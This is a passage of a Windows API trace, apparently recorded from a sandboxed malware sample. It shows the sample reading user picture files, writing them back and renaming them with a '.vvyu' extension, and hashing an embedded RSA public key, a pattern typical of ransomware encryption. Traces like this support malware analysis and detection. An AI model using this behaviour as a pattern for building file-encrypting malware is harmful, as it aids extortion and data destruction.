(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3248 [0199.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31e8 [0199.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3200 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3260 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3230 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3278 [0199.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3218 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3230 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31e8 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3248 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3278 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.747] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31e8 | out: hHeap=0x620000) returned 1 [0199.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.748] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.748] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0199.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.749] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.750] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31d0 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0199.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f618 | out: hHeap=0x620000) returned 1 [0199.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0199.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.753] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.754] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.755] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x7b2a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x7b2a, lpOverlapped=0x0) returned 1 [0199.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.755] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x7b2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.755] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.756] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.756] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.757] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.757] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.757] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.757] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.758] CloseHandle (hObject=0x510) returned 1 [0199.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0199.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0199.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0199.761] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\2j2l02AsmvpG-FW9.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\2j2l02asmvpg-fw9.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\2j2l02AsmvpG-FW9.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\2j2l02asmvpg-fw9.gif.vvyu")) returned 1 [0199.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.763] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0199.766] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bc92180, ftCreationTime.dwHighDateTime=0x1d8a0c6, ftLastAccessTime.dwLowDateTime=0xbfa06ba0, ftLastAccessTime.dwHighDateTime=0x1d8a730, ftLastWriteTime.dwLowDateTime=0xbfa06ba0, ftLastWriteTime.dwHighDateTime=0x1d8a730, nFileSizeHigh=0x0, nFileSizeLow=0x163bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7Wfuj5RqE1i.gif", cAlternateFileName="7WFUJ5~1.GIF")) returned 1 [0199.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0199.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e91710 [0199.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0199.767] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\7Wfuj5RqE1i.gif") returned=".gif" [0199.767] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\kyMAgs7f-4q1mza r\\7Wfuj5RqE1i.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kymags7f-4q1mza r\\7wfuj5rqe1i.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.768] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=91068) returned 1 [0199.768] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.772] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x16396, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.772] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.774] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.774] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x163bc, lpOverlapped=0x0) returned 1 [0199.776] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.776] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.776] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.776] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.777] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.778] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.778] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.778] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.778] GetLastError () returned 0x0 [0199.778] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.778] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.779] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.779] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.779] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x163c0) returned 0x2ea79b0 [0199.779] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f618 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31b8 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f660 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea31d0 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3200 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3218 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.780] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3218 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3200 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0199.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0199.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0199.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3218 | out: hHeap=0x620000) returned 1 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3200 | out: hHeap=0x620000) returned 1 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3260 | out: hHeap=0x620000) returned 1 [0199.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0199.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.783] GetCurrentThreadId () returned 0x66c [0199.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 